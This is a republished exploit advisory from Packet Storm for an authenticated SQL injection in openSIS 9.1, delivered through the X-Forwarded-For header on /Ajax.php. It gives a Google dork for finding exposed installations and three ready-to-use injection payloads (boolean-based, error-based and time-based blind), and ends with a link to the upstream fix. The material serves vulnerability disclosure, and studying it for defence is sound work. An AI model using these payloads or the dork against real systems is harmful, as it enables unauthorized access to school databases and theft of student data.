openSIS 9.1 SQL Injection

openSIS 9.1 SQL Injection
2024-10-3 21:49:57 Author: packetstormsecurity.com(查看原文) 阅读量:4 收藏

# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
# Google Dork: intext:"openSIS is a product"
# Date: 09.09.2024
# Exploit Author: Devrim Dıragumandan (d0ub1edd)
# Vendor Homepage: https://www.os4ed.com/
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
# Version: 9.1
# Tested on: LinuxA SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. 
GET /Ajax.php?modname=x HTTP/1.1
---
    Parameter: X-Forwarded-For #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
--- 
FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

文章来源: https://packetstormsecurity.com/files/181989/opensis91-sql.txt
如有侵权请联系:admin#unsafe.sh